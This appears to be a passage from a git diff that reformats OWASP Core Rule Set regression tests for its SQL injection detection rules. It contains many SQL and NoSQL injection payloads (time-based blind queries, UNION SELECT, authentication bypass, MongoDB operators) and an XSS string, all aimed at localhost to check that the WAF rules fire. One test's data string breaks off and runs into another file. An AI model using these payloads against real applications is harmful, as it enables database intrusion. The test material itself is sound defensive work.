Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 10 desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/if(now()=sysdate(),sleep(12),0)" - version: HTTP/1.0 - output: - log_contains: id "942160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml index 6dff839..44ce44b 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml @@ -1,71 +1,69 @@ --- meta: author: "Franziska Bühler, azurit" - description: None - enabled: true - name: 942170.yaml +rule_id: 942170 tests: - - test_title: 942170-1 + - test_id: 1 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] + - test_id: 2 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3B%20sleep%280%29" - version: HTTP/1.0 - output: - log_contains: id "942170" - - test_title: 942170-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3B%20sleep%280%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] + - test_id: 3 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=I%20sleep%20well%21" - version: HTTP/1.0 - output: - no_log_contains: id "942170" - - test_title: 942170-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=I%20sleep%20well%21" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942170] + - test_id: 4 desc: "Status Page Test - SQL injection test with select if(x" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=select+if(x" - version: HTTP/1.0 - output: - log_contains: id "942170" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=select+if(x" + version: HTTP/1.0 + output: + log: + expect_ids: [942170] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml index b467c61..8b96a08 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml @@ -1,137 +1,135 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942180.yaml +rule_id: 942180 tests: - - test_title: 942180-1 + - test_id: 1 desc: "basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/get?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - test_title: 942180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/get?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log: + expect_ids: [942180] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" - version: HTTP/1.0 - output: - log_contains: id "942251" - - test_title: 942251-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log: + expect_ids: [942251] + - test_id: 2 desc: "Detects having injections negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=having%20fun" - version: HTTP/1.0 - output: - no_log_contains: id "942251" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=having%20fun" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942251] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index 08d6b99..82641f3 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, Christian Folini, azurit" - description: None - enabled: true - name: 942260.yaml +rule_id: 942260 tests: - - test_title: 942260-1 + - test_id: 1 desc: "Basic SQL authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # something LIKE ' - uri: "/get?var=something%20LIKE%20%27" - version: HTTP/1.0 - output: - log_contains: id "942260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/get?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942260] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index 812a061..0afc59e 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -1,39 +1,37 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942270.yaml +rule_id: 942270 tests: - - test_title: 942270-1 + - test_id: 1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=union%20select%20col%20from" - version: HTTP/1.0 - output: - log_contains: id "942270" - - test_title: 942270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log: + expect_ids: [942270] + - test_id: 2 desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=Xunionselectfrom" - version: HTTP/1.0 - output: - log_contains: id "942270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log: + expect_ids: [942270] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index 7608a7f..07d1d74 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942280.yaml +rule_id: 942280 tests: - - test_title: 942280-1 + - test_id: 1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=select%20pg_sleep" - version: HTTP/1.0 - output: - log_contains: id "942280" - - test_title: 942280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log: + expect_ids: [942280] + - test_id: 2 desc: "SQL Server waitfor delay attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" - version: HTTP/1.0 - output: - log_contains: id "942280" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942280] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index 82f810d..bac7054 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -1,161 +1,159 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 942290.yaml +rule_id: 942290 tests: - - test_title: 942290-1 + - test_id: 1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$ne]=2" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-2 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$ne]=2" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 2 desc: "basic MongoDB NOSQL injection attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?mongoQ=%5b%24lte%5dasdfsd" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 3 desc: "basic MongoDB NOSQL injection attempts 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 4 desc: "basic MongoDB NOSQL injection attempts 3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/mongo/show.php?u_id[$regex]=2" - version: HTTP/1.0 - output: - log_contains: id "942290" - - test_title: 942290-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log: + expect_ids: [942290] + - test_id: 5 desc: "basic MongoDB NOSQL injection attempts 4" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$not": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$not": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 6 desc: "basic MongoDB NOSQL injection attempts 5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$nor": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$nor": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 7 desc: "basic MongoDB NOSQL injection attempts 6" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$where": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$where": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 8 desc: "basic MongoDB NOSQL injection attempts 7" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$elemMatch": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" - - test_title: 942290-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$elemMatch": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] + - test_id: 9 desc: "basic MongoDB NOSQL injection attempts 8" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"$text": "foo"}' - version: "HTTP/1.1" - output: - log_contains: id "942290" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"$text": "foo"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [942290] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml index f6a8019..4d19c27 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -1,58 +1,56 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None - enabled: true - name: 942300.yaml +rule_id: 942300 tests: - - test_title: 942300-1 + - test_id: 1 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942300] + - test_id: 2 desc: "MySQL comments, conditions and ch(a)r injectionss" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=) when 234 then&foo=bar" - version: HTTP/1.0 - output: - log_contains: id "942300" - - test_title: 942300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942300] + - test_id: 3 desc: "No false positives with for. Issue #2007" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=booked%20for%202021%28including%202020" - version: HTTP/1.0 - output: - no_log_contains: id "942300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942300] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml index 1e34f1e..e198085 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -1,63 +1,61 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942310.yaml +rule_id: 942310 tests: - - test_title: 942310-1 + - test_id: 1 desc: | Chained SQL injection attempts 2/2. This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). This test now checks that no match occurs for something that would have matched the original expression. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%22%27%20and%20%3d%20bar" - version: HTTP/1.0 - output: - no_log_contains: id "942310" - - test_title: 942310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942310] + - test_id: 2 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" - version: HTTP/1.0 - output: - log_contains: id "942310" - - test_title: 942310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] + - test_id: 3 desc: | Chained SQL injection attempts 2/2. This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" - version: HTTP/1.0 - output: - log_contains: id "942310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log: + expect_ids: [942310] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml index 94b3ae3..59c8ca3 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -1,219 +1,217 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None - enabled: true - name: 942320.yaml +rule_id: 942320 tests: - - test_title: 942320-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=procedure%20analyse%20%28" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 